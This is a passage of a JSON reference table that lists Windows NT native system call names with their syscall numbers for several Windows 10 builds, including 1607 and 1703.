"NtCancelTimer2": 143, "NtCancelWaitCompletionPacket": 144, "NtCommitComplete": 145, "NtCommitEnlistment": 146, "NtCommitTransaction": 147, "NtCompactKeys": 148, "NtCompareObjects": 149, "NtCompareTokens": 150, "NtCompleteConnectPort": 151, "NtCompressKey": 152, "NtConnectPort": 153, "NtCreateDebugObject": 154, "NtCreateDirectoryObject": 155, "NtCreateDirectoryObjectEx": 156, "NtCreateEnclave": 157, "NtCreateEnlistment": 158, "NtCreateEventPair": 159, "NtCreateIRTimer": 160, "NtCreateIoCompletion": 161, "NtCreateJobObject": 162, "NtCreateJobSet": 163, "NtCreateKeyTransacted": 164, "NtCreateKeyedEvent": 165, "NtCreateLowBoxToken": 166, "NtCreateMailslotFile": 167, "NtCreateMutant": 168, "NtCreateNamedPipeFile": 169, "NtCreatePagingFile": 170, "NtCreatePartition": 171, "NtCreatePort": 172, "NtCreatePrivateNamespace": 173, "NtCreateProcess": 174, "NtCreateProfile": 175, "NtCreateProfileEx": 176, "NtCreateResourceManager": 177, "NtCreateSemaphore": 178, "NtCreateSymbolicLinkObject": 179, "NtCreateThreadEx": 180, "NtCreateTimer": 181, "NtCreateTimer2": 182, "NtCreateToken": 183, "NtCreateTokenEx": 184, "NtCreateTransaction": 185, "NtCreateTransactionManager": 186, "NtCreateUserProcess": 187, "NtCreateWaitCompletionPacket": 188, "NtCreateWaitablePort": 189, "NtCreateWnfStateName": 190, "NtCreateWorkerFactory": 191, "NtDebugActiveProcess": 192, "NtDebugContinue": 193, "NtDeleteAtom": 194, "NtDeleteBootEntry": 195, "NtDeleteDriverEntry": 196, "NtDeleteFile": 197, "NtDeleteKey": 198, "NtDeleteObjectAuditAlarm": 199, "NtDeletePrivateNamespace": 200, "NtDeleteValueKey": 201, "NtDeleteWnfStateData": 202, "NtDeleteWnfStateName": 203, "NtDisableLastKnownGood": 204, "NtDisplayString": 205, "NtDrawText": 206, "NtEnableLastKnownGood": 207, "NtEnumerateBootEntries": 208, "NtEnumerateDriverEntries": 209, "NtEnumerateSystemEnvironmentValuesEx": 210, "NtEnumerateTransactionObject": 211, "NtExtendSection": 212, "NtFilterBootOption": 213, "NtFilterToken": 214, "NtFilterTokenEx": 215, "NtFlushBuffersFileEx": 216, "NtFlushInstallUILanguage": 217, "NtFlushInstructionCache": 218, "NtFlushKey": 219, "NtFlushProcessWriteBuffers": 220, "NtFlushVirtualMemory": 221, "NtFlushWriteBuffer": 222, "NtFreeUserPhysicalPages": 223, "NtFreezeRegistry": 224, "NtFreezeTransactions": 225, "NtGetCachedSigningLevel": 226, "NtGetCompleteWnfStateSubscription": 227, "NtGetContextThread": 228, "NtGetCurrentProcessorNumber": 229, "NtGetCurrentProcessorNumberEx": 230, "NtGetDevicePowerState": 231, "NtGetMUIRegistryInfo": 232, "NtGetNextProcess": 233, "NtGetNextThread": 234, "NtGetNlsSectionPtr": 235, "NtGetNotificationResourceManager": 236, "NtGetWriteWatch": 237, "NtImpersonateAnonymousToken": 238, "NtImpersonateThread": 239, "NtInitializeEnclave": 240, "NtInitializeNlsFiles": 241, "NtInitializeRegistry": 242, "NtInitiatePowerAction": 243, "NtIsSystemResumeAutomatic": 244, "NtIsUILanguageComitted": 245, "NtListenPort": 246, "NtLoadDriver": 247, "NtLoadEnclaveData": 248, "NtLoadKey": 249, "NtLoadKey2": 250, "NtLoadKeyEx": 251, "NtLockFile": 252, "NtLockProductActivationKeys": 253, "NtLockRegistryKey": 254, "NtLockVirtualMemory": 255, "NtMakePermanentObject": 256, "NtMakeTemporaryObject": 257, "NtManagePartition": 258, "NtMapCMFModule": 259, "NtMapUserPhysicalPages": 260, "NtModifyBootEntry": 261, "NtModifyDriverEntry": 262, "NtNotifyChangeDirectoryFile": 263, "NtNotifyChangeKey": 264, "NtNotifyChangeMultipleKeys": 265, "NtNotifyChangeSession": 266, "NtOpenEnlistment": 267, "NtOpenEventPair": 268, "NtOpenIoCompletion": 269, "NtOpenJobObject": 270, "NtOpenKeyEx": 271, "NtOpenKeyTransacted": 272, "NtOpenKeyTransactedEx": 273, "NtOpenKeyedEvent": 274, "NtOpenMutant": 275, "NtOpenObjectAuditAlarm": 276, "NtOpenPartition": 277, "NtOpenPrivateNamespace": 278, "NtOpenProcessToken": 279, "NtOpenResourceManager": 280, "NtOpenSemaphore": 281, "NtOpenSession": 282, "NtOpenSymbolicLinkObject": 283, "NtOpenThread": 284, "NtOpenTimer": 285, "NtOpenTransaction": 286, "NtOpenTransactionManager": 287, "NtPlugPlayControl": 288, "NtPrePrepareComplete": 289, "NtPrePrepareEnlistment": 290, "NtPrepareComplete": 291, "NtPrepareEnlistment": 292, "NtPrivilegeCheck": 293, "NtPrivilegeObjectAuditAlarm": 294, "NtPrivilegedServiceAuditAlarm": 295, "NtPropagationComplete": 296, "NtPropagationFailed": 297, "NtPulseEvent": 298, "NtQueryBootEntryOrder": 299, "NtQueryBootOptions": 300, "NtQueryDebugFilterState": 301, "NtQueryDirectoryObject": 302, "NtQueryDriverEntryOrder": 303, "NtQueryEaFile": 304, "NtQueryFullAttributesFile": 305, "NtQueryInformationAtom": 306, "NtQueryInformationEnlistment": 307, "NtQueryInformationJobObject": 308, "NtQueryInformationPort": 309, "NtQueryInformationResourceManager": 310, "NtQueryInformationTransaction": 311, "NtQueryInformationTransactionManager": 312, "NtQueryInformationWorkerFactory": 313, "NtQueryInstallUILanguage": 314, "NtQueryIntervalProfile": 315, "NtQueryIoCompletion": 316, "NtQueryLicenseValue": 317, "NtQueryMultipleValueKey": 318, "NtQueryMutant": 319, "NtQueryOpenSubKeys": 320, "NtQueryOpenSubKeysEx": 321, "NtQueryPortInformationProcess": 322, "NtQueryQuotaInformationFile": 323, "NtQuerySecurityAttributesToken": 324, "NtQuerySecurityObject": 325, "NtQuerySemaphore": 326, "NtQuerySymbolicLinkObject": 327, "NtQuerySystemEnvironmentValue": 328, "NtQuerySystemEnvironmentValueEx": 329, "NtQuerySystemInformationEx": 330, "NtQueryTimerResolution": 331, "NtQueryWnfStateData": 332, "NtQueryWnfStateNameInformation": 333, "NtQueueApcThreadEx": 334, "NtRaiseException": 335, "NtRaiseHardError": 336, "NtReadOnlyEnlistment": 337, "NtRecoverEnlistment": 338, "NtRecoverResourceManager": 339, "NtRecoverTransactionManager": 340, "NtRegisterProtocolAddressInformation": 341, "NtRegisterThreadTerminatePort": 342, "NtReleaseKeyedEvent": 343, "NtReleaseWorkerFactoryWorker": 344, "NtRemoveIoCompletionEx": 345, "NtRemoveProcessDebug": 346, "NtRenameKey": 347, "NtRenameTransactionManager": 348, "NtReplaceKey": 349, "NtReplacePartitionUnit": 350, "NtReplyWaitReplyPort": 351, "NtRequestPort": 352, "NtResetEvent": 353, "NtResetWriteWatch": 354, "NtRestoreKey": 355, "NtResumeProcess": 356, "NtRevertContainerImpersonation": 357, "NtRollbackComplete": 358, "NtRollbackEnlistment": 359, "NtRollbackTransaction": 360, "NtRollforwardTransactionManager": 361, "NtSaveKey": 362, "NtSaveKeyEx": 363, "NtSaveMergedKeys": 364, "NtSecureConnectPort": 365, "NtSerializeBoot": 366, "NtSetBootEntryOrder": 367, "NtSetBootOptions": 368, "NtSetCachedSigningLevel": 369, "NtSetContextThread": 370, "NtSetDebugFilterState": 371, "NtSetDefaultHardErrorPort": 372, "NtSetDefaultLocale": 373, "NtSetDefaultUILanguage": 374, "NtSetDriverEntryOrder": 375, "NtSetEaFile": 376, "NtSetHighEventPair": 377, "NtSetHighWaitLowEventPair": 378, "NtSetIRTimer": 379, "NtSetInformationDebugObject": 380, "NtSetInformationEnlistment": 381, "NtSetInformationJobObject": 382, "NtSetInformationKey": 383, "NtSetInformationResourceManager": 384, "NtSetInformationSymbolicLink": 385, "NtSetInformationToken": 386, "NtSetInformationTransaction": 387, "NtSetInformationTransactionManager": 388, "NtSetInformationVirtualMemory": 389, "NtSetInformationWorkerFactory": 390, "NtSetIntervalProfile": 391, "NtSetIoCompletion": 392, "NtSetIoCompletionEx": 393, "NtSetLdtEntries": 394, "NtSetLowEventPair": 395, "NtSetLowWaitHighEventPair": 396, "NtSetQuotaInformationFile": 397, "NtSetSecurityObject": 398, "NtSetSystemEnvironmentValue": 399, "NtSetSystemEnvironmentValueEx": 400, "NtSetSystemInformation": 401, "NtSetSystemPowerState": 402, "NtSetSystemTime": 403, "NtSetThreadExecutionState": 404, "NtSetTimer2": 405, "NtSetTimerEx": 406, "NtSetTimerResolution": 407, "NtSetUuidSeed": 408, "NtSetVolumeInformationFile": 409, "NtSetWnfProcessNotificationEvent": 410, "NtShutdownSystem": 411, "NtShutdownWorkerFactory": 412, "NtSignalAndWaitForSingleObject": 413, "NtSinglePhaseReject": 414, "NtStartProfile": 415, "NtStopProfile": 416, "NtSubscribeWnfStateChange": 417, "NtSuspendProcess": 418, "NtSuspendThread": 419, "NtSystemDebugControl": 420, "NtTerminateJobObject": 421, "NtTestAlert": 422, "NtThawRegistry": 423, "NtThawTransactions": 424, "NtTraceControl": 425, "NtTranslateFilePath": 426, "NtUmsThreadYield": 427, "NtUnloadDriver": 428, "NtUnloadKey": 429, "NtUnloadKey2": 430, "NtUnloadKeyEx": 431, "NtUnlockFile": 432, "NtUnlockVirtualMemory": 433, "NtUnmapViewOfSectionEx": 434, "NtUnsubscribeWnfStateChange": 435, "NtUpdateWnfStateData": 436, "NtVdmControl": 437, "NtWaitForAlertByThreadId": 438, "NtWaitForDebugEvent": 439, "NtWaitForKeyedEvent": 440, "NtWaitForWorkViaWorkerFactory": 441, "NtWaitHighEventPair": 442, "NtWaitLowEventPair": 443}, "1607": {"NtAccessCheck": 0, "NtWorkerFactoryWorkerReady": 1, "NtAcceptConnectPort": 2, "NtMapUserPhysicalPagesScatter": 3, "NtWaitForSingleObject": 4, "NtCallbackReturn": 5, "NtReadFile": 6, "NtDeviceIoControlFile": 7, "NtWriteFile": 8, "NtRemoveIoCompletion": 9, "NtReleaseSemaphore": 10, "NtReplyWaitReceivePort": 11, "NtReplyPort": 12, "NtSetInformationThread": 13, "NtSetEvent": 14, "NtClose": 15, "NtQueryObject": 16, "NtQueryInformationFile": 17, "NtOpenKey": 18, "NtEnumerateValueKey": 19, "NtFindAtom": 20, "NtQueryDefaultLocale": 21, "NtQueryKey": 22, "NtQueryValueKey": 23, "NtAllocateVirtualMemory": 24, "NtQueryInformationProcess": 25, "NtWaitForMultipleObjects32": 26, "NtWriteFileGather": 27, "NtSetInformationProcess": 28, "NtCreateKey": 29, "NtFreeVirtualMemory": 30, "NtImpersonateClientOfPort": 31, "NtReleaseMutant": 32, "NtQueryInformationToken": 33, "NtRequestWaitReplyPort": 34, "NtQueryVirtualMemory": 35, "NtOpenThreadToken": 36, "NtQueryInformationThread": 37, "NtOpenProcess": 38, "NtSetInformationFile": 39, "NtMapViewOfSection": 40, "NtAccessCheckAndAuditAlarm": 41, "NtUnmapViewOfSection": 42, "NtReplyWaitReceivePortEx": 43, "NtTerminateProcess": 44, "NtSetEventBoostPriority": 45, "NtReadFileScatter": 46, "NtOpenThreadTokenEx": 47, "NtOpenProcessTokenEx": 48, "NtQueryPerformanceCounter": 49, "NtEnumerateKey": 50, "NtOpenFile": 51, "NtDelayExecution": 52, "NtQueryDirectoryFile": 53, "NtQuerySystemInformation": 54, "NtOpenSection": 55, "NtQueryTimer": 56, "NtFsControlFile": 57, "NtWriteVirtualMemory": 58, "NtCloseObjectAuditAlarm": 59, "NtDuplicateObject": 60, "NtQueryAttributesFile": 61, "NtClearEvent": 62, "NtReadVirtualMemory": 63, "NtOpenEvent": 64, "NtAdjustPrivilegesToken": 65, "NtDuplicateToken": 66, "NtContinue": 67, "NtQueryDefaultUILanguage": 68, "NtQueueApcThread": 69, "NtYieldExecution": 70, "NtAddAtom": 71, "NtCreateEvent": 72, "NtQueryVolumeInformationFile": 73, "NtCreateSection": 74, "NtFlushBuffersFile": 75, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtCreateThread": 78, "NtIsProcessInJob": 79, "NtProtectVirtualMemory": 80, "NtQuerySection": 81, "NtResumeThread": 82, "NtTerminateThread": 83, "NtReadRequestData": 84, "NtCreateFile": 85, "NtQueryEvent": 86, "NtWriteRequestData": 87, "NtOpenDirectoryObject": 88, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtQuerySystemTime": 90, "NtWaitForMultipleObjects": 91, "NtSetInformationObject": 92, "NtCancelIoFile": 93, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtSetValueKey": 96, "NtCancelTimer": 97, "NtSetTimer": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAddAtomEx": 103, "NtAddBootEntry": 104, "NtAddDriverEntry": 105, "NtAdjustGroupsToken": 106, "NtAdjustTokenClaimsAndDeviceGroups": 107, "NtAlertResumeThread": 108, "NtAlertThread": 109, "NtAlertThreadByThreadId": 110, "NtAllocateLocallyUniqueId": 111, "NtAllocateReserveObject": 112, "NtAllocateUserPhysicalPages": 113, "NtAllocateUuids": 114, "NtAlpcAcceptConnectPort": 115, "NtAlpcCancelMessage": 116, "NtAlpcConnectPort": 117, "NtAlpcConnectPortEx": 118, "NtAlpcCreatePort": 119, "NtAlpcCreatePortSection": 120, "NtAlpcCreateResourceReserve": 121, "NtAlpcCreateSectionView": 122, "NtAlpcCreateSecurityContext": 123, "NtAlpcDeletePortSection": 124, "NtAlpcDeleteResourceReserve": 125, "NtAlpcDeleteSectionView": 126, "NtAlpcDeleteSecurityContext": 127, "NtAlpcDisconnectPort": 128, "NtAlpcImpersonateClientContainerOfPort": 129, "NtAlpcImpersonateClientOfPort": 130, "NtAlpcOpenSenderProcess": 131, "NtAlpcOpenSenderThread": 132, "NtAlpcQueryInformation": 133, "NtAlpcQueryInformationMessage": 134, "NtAlpcRevokeSecurityContext": 135, "NtAlpcSendWaitReceivePort": 136, "NtAlpcSetInformation": 137, "NtAreMappedFilesTheSame": 138, "NtAssignProcessToJobObject": 139, "NtAssociateWaitCompletionPacket": 140, "NtCancelIoFileEx": 141, "NtCancelSynchronousIoFile": 142, "NtCancelTimer2": 143, "NtCancelWaitCompletionPacket": 144, "NtCommitComplete": 145, "NtCommitEnlistment": 146, "NtCommitRegistryTransaction": 147, "NtCommitTransaction": 148, "NtCompactKeys": 149, "NtCompareObjects": 150, "NtCompareTokens": 151, "NtCompleteConnectPort": 152, "NtCompressKey": 153, "NtConnectPort": 154, "NtCreateDebugObject": 155, "NtCreateDirectoryObject": 156, "NtCreateDirectoryObjectEx": 157, "NtCreateEnclave": 158, "NtCreateEnlistment": 159, "NtCreateEventPair": 160, "NtCreateIRTimer": 161, "NtCreateIoCompletion": 162, "NtCreateJobObject": 163, "NtCreateJobSet": 164, "NtCreateKeyTransacted": 165, "NtCreateKeyedEvent": 166, "NtCreateLowBoxToken": 167, "NtCreateMailslotFile": 168, "NtCreateMutant": 169, "NtCreateNamedPipeFile": 170, "NtCreatePagingFile": 171, "NtCreatePartition": 172, "NtCreatePort": 173, "NtCreatePrivateNamespace": 174, "NtCreateProcess": 175, "NtCreateProfile": 176, "NtCreateProfileEx": 177, "NtCreateRegistryTransaction": 178, "NtCreateResourceManager": 179, "NtCreateSemaphore": 180, "NtCreateSymbolicLinkObject": 181, "NtCreateThreadEx": 182, "NtCreateTimer": 183, "NtCreateTimer2": 184, "NtCreateToken": 185, "NtCreateTokenEx": 186, "NtCreateTransaction": 187, "NtCreateTransactionManager": 188, "NtCreateUserProcess": 189, "NtCreateWaitCompletionPacket": 190, "NtCreateWaitablePort": 191, "NtCreateWnfStateName": 192, "NtCreateWorkerFactory": 193, "NtDebugActiveProcess": 194, "NtDebugContinue": 195, "NtDeleteAtom": 196, "NtDeleteBootEntry": 197, "NtDeleteDriverEntry": 198, "NtDeleteFile": 199, "NtDeleteKey": 200, "NtDeleteObjectAuditAlarm": 201, "NtDeletePrivateNamespace": 202, "NtDeleteValueKey": 203, "NtDeleteWnfStateData": 204, "NtDeleteWnfStateName": 205, "NtDisableLastKnownGood": 206, "NtDisplayString": 207, "NtDrawText": 208, "NtEnableLastKnownGood": 209, "NtEnumerateBootEntries": 210, "NtEnumerateDriverEntries": 211, "NtEnumerateSystemEnvironmentValuesEx": 212, "NtEnumerateTransactionObject": 213, "NtExtendSection": 214, "NtFilterBootOption": 215, "NtFilterToken": 216, "NtFilterTokenEx": 217, "NtFlushBuffersFileEx": 218, "NtFlushInstallUILanguage": 219, "NtFlushInstructionCache": 220, "NtFlushKey": 221, "NtFlushProcessWriteBuffers": 222, "NtFlushVirtualMemory": 223, "NtFlushWriteBuffer": 224, "NtFreeUserPhysicalPages": 225, "NtFreezeRegistry": 226, "NtFreezeTransactions": 227, "NtGetCachedSigningLevel": 228, "NtGetCompleteWnfStateSubscription": 229, "NtGetContextThread": 230, "NtGetCurrentProcessorNumber": 231, "NtGetCurrentProcessorNumberEx": 232, "NtGetDevicePowerState": 233, "NtGetMUIRegistryInfo": 234, "NtGetNextProcess": 235, "NtGetNextThread": 236, "NtGetNlsSectionPtr": 237, "NtGetNotificationResourceManager": 238, "NtGetWriteWatch": 239, "NtImpersonateAnonymousToken": 240, "NtImpersonateThread": 241, "NtInitializeEnclave": 242, "NtInitializeNlsFiles": 243, "NtInitializeRegistry": 244, "NtInitiatePowerAction": 245, "NtIsSystemResumeAutomatic": 246, "NtIsUILanguageComitted": 247, "NtListenPort": 248, "NtLoadDriver": 249, "NtLoadEnclaveData": 250, "NtLoadKey": 251, "NtLoadKey2": 252, "NtLoadKeyEx": 253, "NtLockFile": 254, "NtLockProductActivationKeys": 255, "NtLockRegistryKey": 256, "NtLockVirtualMemory": 257, "NtMakePermanentObject": 258, "NtMakeTemporaryObject": 259, "NtManagePartition": 260, "NtMapCMFModule": 261, "NtMapUserPhysicalPages": 262, "NtModifyBootEntry": 263, "NtModifyDriverEntry": 264, "NtNotifyChangeDirectoryFile": 265, "NtNotifyChangeKey": 266, "NtNotifyChangeMultipleKeys": 267, "NtNotifyChangeSession": 268, "NtOpenEnlistment": 269, "NtOpenEventPair": 270, "NtOpenIoCompletion": 271, "NtOpenJobObject": 272, "NtOpenKeyEx": 273, "NtOpenKeyTransacted": 274, "NtOpenKeyTransactedEx": 275, "NtOpenKeyedEvent": 276, "NtOpenMutant": 277, "NtOpenObjectAuditAlarm": 278, "NtOpenPartition": 279, "NtOpenPrivateNamespace": 280, "NtOpenProcessToken": 281, "NtOpenRegistryTransaction": 282, "NtOpenResourceManager": 283, "NtOpenSemaphore": 284, "NtOpenSession": 285, "NtOpenSymbolicLinkObject": 286, "NtOpenThread": 287, "NtOpenTimer": 288, "NtOpenTransaction": 289, "NtOpenTransactionManager": 290, "NtPlugPlayControl": 291, "NtPrePrepareComplete": 292, "NtPrePrepareEnlistment": 293, "NtPrepareComplete": 294, "NtPrepareEnlistment": 295, "NtPrivilegeCheck": 296, "NtPrivilegeObjectAuditAlarm": 297, "NtPrivilegedServiceAuditAlarm": 298, "NtPropagationComplete": 299, "NtPropagationFailed": 300, "NtPulseEvent": 301, "NtQueryBootEntryOrder": 302, "NtQueryBootOptions": 303, "NtQueryDebugFilterState": 304, "NtQueryDirectoryObject": 305, "NtQueryDriverEntryOrder": 306, "NtQueryEaFile": 307, "NtQueryFullAttributesFile": 308, "NtQueryInformationAtom": 309, "NtQueryInformationEnlistment": 310, "NtQueryInformationJobObject": 311, "NtQueryInformationPort": 312, "NtQueryInformationResourceManager": 313, "NtQueryInformationTransaction": 314, "NtQueryInformationTransactionManager": 315, "NtQueryInformationWorkerFactory": 316, "NtQueryInstallUILanguage": 317, "NtQueryIntervalProfile": 318, "NtQueryIoCompletion": 319, "NtQueryLicenseValue": 320, "NtQueryMultipleValueKey": 321, "NtQueryMutant": 322, "NtQueryOpenSubKeys": 323, "NtQueryOpenSubKeysEx": 324, "NtQueryPortInformationProcess": 325, "NtQueryQuotaInformationFile": 326, "NtQuerySecurityAttributesToken": 327, "NtQuerySecurityObject": 328, "NtQuerySecurityPolicy": 329, "NtQuerySemaphore": 330, "NtQuerySymbolicLinkObject": 331, "NtQuerySystemEnvironmentValue": 332, "NtQuerySystemEnvironmentValueEx": 333, "NtQuerySystemInformationEx": 334, "NtQueryTimerResolution": 335, "NtQueryWnfStateData": 336, "NtQueryWnfStateNameInformation": 337, "NtQueueApcThreadEx": 338, "NtRaiseException": 339, "NtRaiseHardError": 340, "NtReadOnlyEnlistment": 341, "NtRecoverEnlistment": 342, "NtRecoverResourceManager": 343, "NtRecoverTransactionManager": 344, "NtRegisterProtocolAddressInformation": 345, "NtRegisterThreadTerminatePort": 346, "NtReleaseKeyedEvent": 347, "NtReleaseWorkerFactoryWorker": 348, "NtRemoveIoCompletionEx": 349, "NtRemoveProcessDebug": 350, "NtRenameKey": 351, "NtRenameTransactionManager": 352, "NtReplaceKey": 353, "NtReplacePartitionUnit": 354, "NtReplyWaitReplyPort": 355, "NtRequestPort": 356, "NtResetEvent": 357, "NtResetWriteWatch": 358, "NtRestoreKey": 359, "NtResumeProcess": 360, "NtRevertContainerImpersonation": 361, "NtRollbackComplete": 362, "NtRollbackEnlistment": 363, "NtRollbackRegistryTransaction": 364, "NtRollbackTransaction": 365, "NtRollforwardTransactionManager": 366, "NtSaveKey": 367, "NtSaveKeyEx": 368, "NtSaveMergedKeys": 369, "NtSecureConnectPort": 370, "NtSerializeBoot": 371, "NtSetBootEntryOrder": 372, "NtSetBootOptions": 373, "NtSetCachedSigningLevel": 374, "NtSetCachedSigningLevel2": 375, "NtSetContextThread": 376, "NtSetDebugFilterState": 377, "NtSetDefaultHardErrorPort": 378, "NtSetDefaultLocale": 379, "NtSetDefaultUILanguage": 380, "NtSetDriverEntryOrder": 381, "NtSetEaFile": 382, "NtSetHighEventPair": 383, "NtSetHighWaitLowEventPair": 384, "NtSetIRTimer": 385, "NtSetInformationDebugObject": 386, "NtSetInformationEnlistment": 387, "NtSetInformationJobObject": 388, "NtSetInformationKey": 389, "NtSetInformationResourceManager": 390, "NtSetInformationSymbolicLink": 391, "NtSetInformationToken": 392, "NtSetInformationTransaction": 393, "NtSetInformationTransactionManager": 394, "NtSetInformationVirtualMemory": 395, "NtSetInformationWorkerFactory": 396, "NtSetIntervalProfile": 397, "NtSetIoCompletion": 398, "NtSetIoCompletionEx": 399, "NtSetLdtEntries": 400, "NtSetLowEventPair": 401, "NtSetLowWaitHighEventPair": 402, "NtSetQuotaInformationFile": 403, "NtSetSecurityObject": 404, "NtSetSystemEnvironmentValue": 405, "NtSetSystemEnvironmentValueEx": 406, "NtSetSystemInformation": 407, "NtSetSystemPowerState": 408, "NtSetSystemTime": 409, "NtSetThreadExecutionState": 410, "NtSetTimer2": 411, "NtSetTimerEx": 412, "NtSetTimerResolution": 413, "NtSetUuidSeed": 414, "NtSetVolumeInformationFile": 415, "NtSetWnfProcessNotificationEvent": 416, "NtShutdownSystem": 417, "NtShutdownWorkerFactory": 418, "NtSignalAndWaitForSingleObject": 419, "NtSinglePhaseReject": 420, "NtStartProfile": 421, "NtStopProfile": 422, "NtSubscribeWnfStateChange": 423, "NtSuspendProcess": 424, "NtSuspendThread": 425, "NtSystemDebugControl": 426, "NtTerminateJobObject": 427, "NtTestAlert": 428, "NtThawRegistry": 429, "NtThawTransactions": 430, "NtTraceControl": 431, "NtTranslateFilePath": 432, "NtUmsThreadYield": 433, "NtUnloadDriver": 434, "NtUnloadKey": 435, "NtUnloadKey2": 436, "NtUnloadKeyEx": 437, "NtUnlockFile": 438, "NtUnlockVirtualMemory": 439, "NtUnmapViewOfSectionEx": 440, "NtUnsubscribeWnfStateChange": 441, "NtUpdateWnfStateData": 442, "NtVdmControl": 443, "NtWaitForAlertByThreadId": 444, "NtWaitForDebugEvent": 445, "NtWaitForKeyedEvent": 446, "NtWaitForWorkViaWorkerFactory": 447, "NtWaitHighEventPair": 448, "NtWaitLowEventPair": 449}, "1703": {"NtAccessCheck": 0, "NtWorkerFactoryWorkerReady": 1, "NtAcceptConnectPort": 2, "NtMapUserPhysicalPagesScatter": 3, "NtWaitForSingleObject": 4, "NtCallbackReturn": 5, "NtReadFile": 6, "NtDeviceIoControlFile": 7, "NtWriteFile": 8, "NtRemoveIoCompletion": 9, "NtReleaseSemaphore": 10, "NtReplyWaitReceivePort": 11, "NtReplyPort": 12, "NtSetInformationThread": 13, "NtSetEvent": 14, "NtClose": 15, "NtQueryObject": 16, "NtQueryInformationFile": 17, "NtOpenKey": 18, "NtEnumerateValueKey": 19, "NtFindAtom": 20, "NtQueryDefaultLocale": 21, "NtQueryKey": 22, "NtQueryValueKey": 23, "NtAllocateVirtualMemory": 24, "NtQueryInformationProcess": 25, "NtWaitForMultipleObjects32": 26, "NtWriteFileGather": 27, "NtSetInformationProcess": 28, "NtCreateKey": 29, "NtFreeVirtualMemory": 30, "NtImpersonateClientOfPort": 31, "NtReleaseMutant": 32, "NtQueryInformationToken": 33, "NtRequestWaitReplyPort": 34, "NtQueryVirtualMemory": 35, "NtOpenThreadToken": 36, "NtQueryInformationThread": 37, "NtOpenProcess": 38, "NtSetInformationFile": 39, "NtMapViewOfSection": 40, "NtAccessCheckAndAuditAlarm": 41, "NtUnmapViewOfSection": 42, "NtReplyWaitReceivePortEx": 43, "NtTerminateProcess": 44, "NtSetEventBoostPriority": 45, "NtReadFileScatter": 46, "NtOpenThreadTokenEx": 47, "NtOpenProcessTokenEx": 48, "NtQueryPerformanceCounter": 49, "NtEnumerateKey": 50, "NtOpenFile": 51, "NtDelayExecution": 52, "NtQueryDirectoryFile": 53, "NtQuerySystemInformation": 54, "NtOpenSection": 55, "NtQueryTimer": 56, "NtFsControlFile": 57, "NtWriteVirtualMemory": 58, "NtCloseObjectAuditAlarm": 59, "NtDuplicateObject": 60, "NtQueryAttributesFile": 61, "NtClearEvent": 62, "NtReadVirtualMemory": 63, "NtOpenEvent": 64, "NtAdjustPrivilegesToken": 65, "NtDuplicateToken": 66, "NtContinue": 67, "NtQueryDefaultUILanguage": 68, "NtQueueApcThread": 69, "NtYieldExecution": 70, "NtAddAtom": 71, "NtCreateEvent": 72, "NtQueryVolumeInformationFile": 73, "NtCreateSection": 74, "NtFlushBuffersFile": 75, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtCreateThread": 78, "NtIsProcessInJob": 79, "NtProtectVirtualMemory": 80, "NtQuerySection": 81, "NtResumeThread": 82, "NtTerminateThread": 83, "NtReadRequestData": 84, "NtCreateFile": 85, "NtQueryEvent": 86, "NtWriteRequestData": 87, "NtOpenDirectoryObject": 88, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtQuerySystemTime": 90, "NtWaitForMultipleObjects": 91, "NtSetInformationObject": 92, "NtCancelIoFile": 93, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtSetValueKey": 96, "NtCancelTimer": 97, "NtSetTimer": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAcquireProcessActivityReference": 103, "NtAddAtomEx": 104, "NtAddBootEntry": 105, "NtAddDriverEntry": 106, "NtAdjustGroupsToken": 107, "NtAdjustTokenClaimsAndDeviceGroups": 108, "NtAlertResumeThread": 109, "NtAlertThread": 110, "NtAlertThreadByThreadId": 111, "NtAllocateLocallyUniqueId": 112, "NtAllocateReserveObject": 113, "NtAllocateUserPhysicalPages": 114, "NtAllocateUuids": 115, "NtAlpcAcceptConnectPort": 116, "NtAlpcCancelMessage": 117, "NtAlpcConnectPort": 118, "NtAlpcConnectPortEx": 119, "NtAlpcCreatePort": 120, "NtAlpcCreatePortSection": 121, "NtAlpcCreateResourceReserve": 122, "NtAlpcCreateSectionView": 123, "NtAlpcCreateSecurityContext": 124, "NtAlpcDeletePortSection": 125, "NtAlpcDeleteResourceReserve": 126, "NtAlpcDeleteSectionView": 127, "NtAlpcDeleteSecurityContext": 128, "NtAlpcDisconnectPort": 129, "NtAlpcImpersonateClientContainerOfPort": 130, "NtAlpcImpersonateClientOfPort": 131, "NtAlpcOpenSenderProcess": 132, "NtAlpcOpenSenderThread": 133, "NtAlpcQueryInformation": 134, "NtAlpcQueryInformationMessage": 135, "NtAlpcRevokeSecurityContext": 136, "NtAlpcSendWaitReceivePort": 137, "NtAlpcSetInformation": 138, "NtAreMappedFilesTheSame": 139, "NtAssignProcessToJobObject": 140, "NtAssociateWaitCompletionPacket": 141, "NtCancelIoFileEx": 142, "NtCancelSynchronousIoFile": 143, "NtCancelTimer2": 144, "NtCancelWaitCompletionPacket": 145, "NtCommitComplete": 146, "NtCommitEnlistment": 147, "NtCommitRegistryTransaction": 148, "NtCommitTransaction": 149, "NtCompactKeys": 150, "NtCompareObjects": 151, "NtCompareSigningLevels": 152, "NtCompareTokens": 153, "NtCompleteConnectPort": 154, "NtCompressKey": 155, "NtConnectPort": 156, "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": 157, "NtCreateDebugObject": 158, "NtCreateDirectoryObject": 159, "NtCreateDirectoryObjectEx": 160, "NtCreateEnclave": 161, "NtCreateEnlistment": 162, "NtCreateEventPair": 163, "NtCreateIRTimer": 164, "NtCreateIoCompletion": 165, "NtCreateJobObject": 166, "NtCreateJobSet": 167, "NtCreateKeyTransacted": 168, "NtCreateKeyedEvent": 169, "NtCreateLowBoxToken": 170, "NtCreateMailslotFile": 171, "NtCreateMutant": 172, "NtCreateNamedPipeFile": 173, "NtCreatePagingFile": 174, "NtCreatePartition": 175, "NtCreatePort": 176, "NtCreatePrivateNamespace": 177, "NtCreateProcess": 178, "NtCreateProfile": 